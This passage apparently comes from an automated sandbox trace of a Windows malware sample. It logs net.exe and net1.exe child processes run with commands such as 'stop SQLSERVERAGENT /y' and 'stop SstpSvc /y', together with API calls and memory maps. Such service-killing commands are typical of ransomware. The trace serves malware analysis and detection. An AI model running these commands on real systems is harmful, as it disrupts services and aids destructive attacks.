lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0114.474] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0114.474] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x20fd28 | out: Buffer=0x20fd28*=0x274d50) returned 0x0 [0114.474] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x20fd28 | out: Buffer=0x20fd28*=0x27c100) returned 0x0 [0114.474] _fileno (_File=0x7fefdba2a80) returned 0 [0114.474] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0114.475] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0114.475] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0114.475] _wcsicmp (_String1="config", _String2="stop") returned -16 [0114.475] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0114.475] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0114.475] _wcsicmp (_String1="file", _String2="stop") returned -13 [0114.475] _wcsicmp (_String1="files", _String2="stop") returned -13 [0114.475] _wcsicmp (_String1="group", _String2="stop") returned -12 [0114.475] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0114.475] _wcsicmp (_String1="help", _String2="stop") returned -11 [0114.475] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0114.475] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0114.475] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0114.475] _wcsicmp (_String1="session", _String2="stop") returned -15 [0114.475] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0114.475] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0114.475] _wcsicmp (_String1="share", _String2="stop") returned -12 [0114.476] _wcsicmp (_String1="start", _String2="stop") returned -14 [0114.476] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0114.476] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0114.476] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0114.476] _wcsicmp (_String1="accounts", _String2="SQLSERVERAGENT") returned -18 [0114.476] _wcsicmp (_String1="computer", _String2="SQLSERVERAGENT") returned -16 [0114.476] _wcsicmp (_String1="config", _String2="SQLSERVERAGENT") returned -16 [0114.476] _wcsicmp (_String1="continue", _String2="SQLSERVERAGENT") returned -16 [0114.476] _wcsicmp (_String1="cont", _String2="SQLSERVERAGENT") returned -16 [0114.476] _wcsicmp (_String1="file", _String2="SQLSERVERAGENT") returned -13 [0114.476] _wcsicmp (_String1="files", _String2="SQLSERVERAGENT") returned -13 [0114.476] _wcsicmp (_String1="group", _String2="SQLSERVERAGENT") returned -12 [0114.476] _wcsicmp (_String1="groups", _String2="SQLSERVERAGENT") returned -12 [0114.476] _wcsicmp (_String1="help", _String2="SQLSERVERAGENT") returned -11 [0114.476] _wcsicmp (_String1="helpmsg", _String2="SQLSERVERAGENT") returned -11 [0114.476] _wcsicmp (_String1="localgroup", _String2="SQLSERVERAGENT") returned -7 [0114.476] _wcsicmp (_String1="pause", _String2="SQLSERVERAGENT") returned -3 [0114.476] _wcsicmp (_String1="session", _String2="SQLSERVERAGENT") returned -12 [0114.477] _wcsicmp (_String1="sessions", _String2="SQLSERVERAGENT") returned -12 [0114.477] _wcsicmp (_String1="sess", _String2="SQLSERVERAGENT") returned -12 [0114.477] _wcsicmp (_String1="share", _String2="SQLSERVERAGENT") returned -9 [0114.477] _wcsicmp (_String1="start", _String2="SQLSERVERAGENT") returned 3 [0114.477] _wcsicmp (_String1="stats", _String2="SQLSERVERAGENT") returned 3 [0114.477] _wcsicmp (_String1="statistics", _String2="SQLSERVERAGENT") returned 3 [0114.477] _wcsicmp (_String1="stop", _String2="SQLSERVERAGENT") returned 3 [0114.477] _wcsicmp (_String1="time", _String2="SQLSERVERAGENT") returned 1 [0114.477] _wcsicmp (_String1="user", _String2="SQLSERVERAGENT") returned 2 [0114.477] _wcsicmp (_String1="users", _String2="SQLSERVERAGENT") returned 2 [0114.477] _wcsicmp (_String1="msg", _String2="SQLSERVERAGENT") returned -6 [0114.477] _wcsicmp (_String1="messenger", _String2="SQLSERVERAGENT") returned -6 [0114.477] _wcsicmp (_String1="receiver", _String2="SQLSERVERAGENT") returned -1 [0114.477] _wcsicmp (_String1="rcv", _String2="SQLSERVERAGENT") returned -1 [0114.477] _wcsicmp (_String1="netpopup", _String2="SQLSERVERAGENT") returned -5 [0114.477] _wcsicmp (_String1="redirector", _String2="SQLSERVERAGENT") returned -1 [0114.477] _wcsicmp (_String1="redir", _String2="SQLSERVERAGENT") returned -1 [0114.477] _wcsicmp (_String1="rdr", _String2="SQLSERVERAGENT") returned -1 [0114.477] _wcsicmp (_String1="workstation", _String2="SQLSERVERAGENT") returned 4 [0114.477] _wcsicmp (_String1="work", _String2="SQLSERVERAGENT") returned 4 [0114.478] _wcsicmp (_String1="wksta", _String2="SQLSERVERAGENT") returned 4 [0114.478] _wcsicmp (_String1="prdr", _String2="SQLSERVERAGENT") returned -3 [0114.478] _wcsicmp (_String1="devrdr", _String2="SQLSERVERAGENT") returned -15 [0114.478] _wcsicmp (_String1="lanmanworkstation", _String2="SQLSERVERAGENT") returned -7 [0114.478] _wcsicmp (_String1="server", _String2="SQLSERVERAGENT") returned -12 [0114.478] _wcsicmp (_String1="svr", _String2="SQLSERVERAGENT") returned 5 [0114.478] _wcsicmp (_String1="srv", _String2="SQLSERVERAGENT") returned 1 [0114.478] _wcsicmp (_String1="lanmanserver", _String2="SQLSERVERAGENT") returned -7 [0114.478] _wcsicmp (_String1="alerter", _String2="SQLSERVERAGENT") returned -18 [0114.478] _wcsicmp (_String1="netlogon", _String2="SQLSERVERAGENT") returned -5 [0114.478] _wcsupr (in: _String="SQLSERVERAGENT" | out: _String="SQLSERVERAGENT") returned="SQLSERVERAGENT" [0114.479] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x27ce10 [0114.484] GetServiceKeyNameW (in: hSCManager=0x27ce10, lpDisplayName="SQLSERVERAGENT", lpServiceName=0xff3f5750, lpcchBuffer=0x20fc48 | out: lpServiceName="", lpcchBuffer=0x20fc48) returned 0 [0114.485] _wcsicmp (_String1="msg", _String2="SQLSERVERAGENT") returned -6 [0114.485] _wcsicmp (_String1="messenger", _String2="SQLSERVERAGENT") returned -6 [0114.485] _wcsicmp (_String1="receiver", _String2="SQLSERVERAGENT") returned -1 [0114.485] _wcsicmp (_String1="rcv", _String2="SQLSERVERAGENT") returned -1 [0114.485] _wcsicmp (_String1="redirector", _String2="SQLSERVERAGENT") returned -1 [0114.485] _wcsicmp (_String1="redir", _String2="SQLSERVERAGENT") returned -1 [0114.485] _wcsicmp (_String1="rdr", _String2="SQLSERVERAGENT") returned -1 [0114.485] _wcsicmp (_String1="workstation", _String2="SQLSERVERAGENT") returned 4 [0114.485] _wcsicmp (_String1="work", _String2="SQLSERVERAGENT") returned 4 [0114.485] _wcsicmp (_String1="wksta", _String2="SQLSERVERAGENT") returned 4 [0114.485] _wcsicmp (_String1="prdr", _String2="SQLSERVERAGENT") returned -3 [0114.485] _wcsicmp (_String1="devrdr", _String2="SQLSERVERAGENT") returned -15 [0114.485] _wcsicmp (_String1="lanmanworkstation", _String2="SQLSERVERAGENT") returned -7 [0114.486] _wcsicmp (_String1="server", _String2="SQLSERVERAGENT") returned -12 [0114.486] _wcsicmp (_String1="svr", _String2="SQLSERVERAGENT") returned 5 [0114.486] _wcsicmp (_String1="srv", _String2="SQLSERVERAGENT") returned 1 [0114.486] _wcsicmp (_String1="lanmanserver", _String2="SQLSERVERAGENT") returned -7 [0114.486] _wcsicmp (_String1="alerter", _String2="SQLSERVERAGENT") returned -18 [0114.486] _wcsicmp (_String1="netlogon", _String2="SQLSERVERAGENT") returned -5 [0114.486] NetServiceControl (in: servername=0x0, service="SQLSERVERAGENT", opcode=0x0, arg=0x0, bufptr=0x20fc50 | out: bufptr=0x20fc50) returned 0x889 [0114.487] wcscpy_s (in: _Destination=0xff3f80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0114.487] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0114.488] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff3f5b50, nSize=0x800, Arguments=0xff3f7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0114.489] GetFileType (hFile=0xb) returned 0x2 [0114.490] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fb18 | out: lpMode=0x20fb18) returned 1 [0114.490] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x20fb10, lpReserved=0x0 | out: lpBuffer=0xff3f5b50*, lpNumberOfCharsWritten=0x20fb10*=0x1e) returned 1 [0114.490] GetFileType (hFile=0xb) returned 0x2 [0114.491] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fb18 | out: lpMode=0x20fb18) returned 1 [0114.491] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20fb10, lpReserved=0x0 | out: lpBuffer=0xff3d1efc*, lpNumberOfCharsWritten=0x20fb10*=0x2) returned 1 [0114.491] _ultow (in: _Dest=0x889, _Radix=2161536 | out: _Dest=0x889) returned="2185" [0114.491] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff3f5b50, nSize=0x800, Arguments=0xff3f7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0114.492] GetFileType (hFile=0xb) returned 0x2 [0114.492] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fb18 | out: lpMode=0x20fb18) returned 1 [0114.492] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x20fb10, lpReserved=0x0 | out: lpBuffer=0xff3f5b50*, lpNumberOfCharsWritten=0x20fb10*=0x34) returned 1 [0114.493] GetFileType (hFile=0xb) returned 0x2 [0114.493] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fb18 | out: lpMode=0x20fb18) returned 1 [0114.493] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20fb10, lpReserved=0x0 | out: lpBuffer=0xff3d1efc*, lpNumberOfCharsWritten=0x20fb10*=0x2) returned 1 [0114.494] NetApiBufferFree (Buffer=0x274d50) returned 0x0 [0114.494] NetApiBufferFree (Buffer=0x27c100) returned 0x0 [0114.494] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLSERVERAGENT /y" [0114.494] exit (_Code=2) Process: id = "308" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x58cf2000" os_pid = "0x420" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SstpSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11084 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11085 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11086 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11087 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 11088 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11089 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11090 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11091 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 11092 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11093 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11094 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 11095 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 11161 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11162 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11163 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 11164 start_va = 0x250000 end_va = 0x2b6fff entry_point = 0x250000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11165 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 11166 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 11167 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11168 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11169 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11170 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 11171 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 11172 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 11173 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 11174 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 11175 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 11176 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 11177 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 11178 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11179 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11180 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11181 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 11182 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11183 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 819 os_tid = 0x1328 Process: id = "309" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x24d4e000" os_pid = "0xb98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "267" os_parent_pid = "0xfcc" cmd_line = "C:\\Windows\\system32\\net1 stop SntpService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11097 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11098 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11099 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11100 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 11101 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11102 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11103 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11104 start_va = 0xff3d0000 end_va = 0xff402fff entry_point = 0xff3d0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 11105 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11106 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11107 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 11108 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 11110 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11111 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11112 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11113 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 11114 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 11115 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 11116 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11117 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11118 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11119 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 11120 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 11121 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 11122 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 11123 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 11124 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 11125 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 11126 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 11127 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 11128 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 11129 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11130 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11131 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11132 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 11133 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 11134 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11135 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11136 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 821 os_tid = 0x9f8 [0114.564] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfb90 | out: lpSystemTimeAsFileTime=0xcfb90*(dwLowDateTime=0xf96c7070, dwHighDateTime=0x1d48689)) [0114.564] GetCurrentProcessId () returned 0xb98 [0114.564] GetCurrentThreadId () returned 0x9f8 [0114.564] GetTickCount () returned 0x26537 [0114.564] QueryPerformanceCounter (in: lpPerformanceCount=0xcfb98 | out: lpPerformanceCount=0xcfb98*=1816148200000) returned 1 [0114.565] GetModuleHandleW (lpModuleName=0x0) returned 0xff3d0000 [0114.565] __set_app_type (_Type=0x1) [0114.565] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff3e9c9c) returned 0x0 [0114.565] __getmainargs (in: _Argc=0xff3f4780, _Argv=0xff3f4790, _Env=0xff3f4788, _DoWildCard=0, _StartInfo=0xff3f479c | out: _Argc=0xff3f4780, _Argv=0xff3f4790, _Env=0xff3f4788) returned 0 [0114.581] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.581] GetConsoleOutputCP () returned 0x1b5 [0114.581] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff3fcec0 | out: lpCPInfo=0xff3fcec0) returned 1 [0114.582] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0114.584] sprintf_s (in: _DstBuf=0xcfb38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0114.584] setlocale (category=0, locale=".437") returned="English_United States.437" [0114.586] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0114.586] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0114.586] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SntpService /y" [0114.586] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcf8d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0114.586] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0114.586] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcfb28 | out: Buffer=0xcfb28*=0x1c4d50) returned 0x0 [0114.586] NetApiBufferAllocate (in: 